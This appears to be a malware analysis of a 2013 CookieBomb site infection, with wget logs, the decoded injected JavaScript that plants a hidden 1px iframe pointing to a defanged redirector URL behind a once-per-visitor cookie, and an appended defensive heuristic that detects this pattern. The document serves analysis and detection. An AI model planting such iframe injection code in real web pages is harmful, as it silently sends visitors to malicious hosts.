- // Access log of a site infected with the CookieBomb injection...
- --2013-07-15 16:57:36-- hxxp://www.antjapan.co.jp/catalog/
- Resolving www.antjapan.co.jp... 211.10.17.56
- Caching www.antjapan.co.jp => 211.10.17.56
- Connecting to www.antjapan.co.jp|211.10.17.56|:80... connected.
- :
- GET /catalog/ HTTP/1.1
- Host: www.antjapan.co.jp
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Mon, 15 Jul 2013 07:55:25 GMT
- Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
- X-Powered-By: PHP/4.4.4
- Set-Cookie: osCsid=e1c9ded7019391417e944b64b8cbf1a4; path=/catalog
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Keep-Alive: timeout=10, max=128
- Connection: Keep-Alive
- Transfer-Encoding: chunked
- Content-Type: text/html; charset=EUC-JP
- 200 OK
- :
- Length: unspecified [text/html]
- Saving to: ‘index.html’
- 2013-07-15 16:57:36 (200 KB/s) - ‘index.html’ saved [4959]
- // Found the OCJP-112 malware infection code in index.html.
- // When decoded...
- function zzzfff(){
- var h = document.createElement('iframe');
- h.src = 'hxxp://www.verdaedevelopment.com/_js/relay.php';
- h.style.position = 'absolute';
- h.style.border = '0';
- h.style.height = '1px';
- h.style.width = '1px';
- h.style.left = '1px';
- h.style.top = '1px';
- if (!document.getElementById('h')){
- document.write('<div id=\'h\'></div>');
- document.getElementById('h').appendChild(h);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path){
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0)nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name){
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))){
- return null;
- }
- if (start == - 1)return null;
- var end = document.cookie.indexOf(";", len);
- if (end == - 1)end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled){
- if (GetCookie('visited_uq') == 55){
- }
- else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
- // Following the malware link....
- --2013-07-15 17:06:16-- hxxp://www.verdaedevelopment.com/_js/relay.php
- Resolving www.verdaedevelopment.com... 174.120.172.123
- Caching www.verdaedevelopment.com => 174.120.172.123
- Connecting to www.verdaedevelopment.com|174.120.172.123|:80... connected.
- :
- GET /_js/relay.php HTTP/1.1
- Referer: http://www.antjapan.co.jp/catalog/
- Host: www.verdaedevelopment.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Date: Mon, 15 Jul 2013 08:04:06 GMT
- Server: Apache
- Keep-Alive: timeout=5, max=75
- Connection: Keep-Alive
- Transfer-Encoding: chunked
- Content-Type: text/html
- 200 OK
- Length: unspecified [text/html]
- Saving to: ‘relay.php’
- 2013-07-15 17:06:17 (20.8 KB/s) - ‘relay.php’ saved [2]
- // "relay.php" is a malware redirector script; when the conditions/timing do not match, it returns a response such as "ok".
- $ cat relay.php
- ok
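
An added example (not part of the original paste or the analyst's tooling): a static heuristic that flags the pattern visible in the decoded script above, a 1px iframe gated by a once-per-visitor cookie. The sample input and the host `redirector.example` are constructed; the `GetCookie`/`SetCookie` helper names are the ones used in the decoded script, and the function name `analyzeDecodedScript` is hypothetical.

```javascript
// SAMPLE is constructed for this example: same shape as the decoded script,
// with a placeholder host and a defanged scheme.
const SAMPLE = `
function f(){
  var h = document.createElement('iframe');
  h.src = 'hxxp://redirector.example/relay.php';
  h.style.position = 'absolute';
  h.style.height = '1px';
  h.style.width = '1px';
  document.getElementById('h').appendChild(h);
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){ } else { SetCookie('visited_uq', '55', '1', '/'); f(); }
}`;

function analyzeDecodedScript(src) {
  const findings = { iframeVars: [], hidden: [], targets: [], cookieGate: null };
  // 1. Variables that hold a dynamically created iframe.
  const createRe = /([A-Za-z_]\w*)\s*=\s*document\.createElement\(\s*['"]iframe['"]\s*\)/g;
  for (const m of src.matchAll(createRe)) findings.iframeVars.push(m[1]);
  for (const v of findings.iframeVars) {
    // 2. Both width and height forced to 0-2 px: the frame is invisible.
    const dimRe = new RegExp(`\\b${v}\\.style\\.(width|height)\\s*=\\s*['"][0-2](?:px)?['"]`, 'g');
    const dims = new Set([...src.matchAll(dimRe)].map(m => m[1]));
    if (dims.has('width') && dims.has('height')) findings.hidden.push(v);
    // 3. Where the frame points (kept as written, e.g. defanged).
    const srcRe = new RegExp(`\\b${v}\\.src\\s*=\\s*['"]([^'"]+)['"]`, 'g');
    for (const m of src.matchAll(srcRe)) findings.targets.push(m[1]);
  }
  // 4. Cookie gate: the same cookie name is both read and written, so the
  //    frame is injected only on a visitor's first hit.
  const names = re => [...src.matchAll(re)].map(m => m[1]);
  const read = names(/GetCookie\(\s*['"]([^'"]+)['"]/g);
  const written = names(/SetCookie\(\s*['"]([^'"]+)['"]/g);
  findings.cookieGate = read.find(n => written.includes(n)) || null;
  findings.suspicious = findings.hidden.length > 0 && findings.cookieGate !== null;
  return findings;
}

console.log(analyzeDecodedScript(SAMPLE));
```

Because of the cookie gate, a crawler that reuses its cookie jar sees the iframe only once, so rescans of a cleaned site should start with cookies cleared.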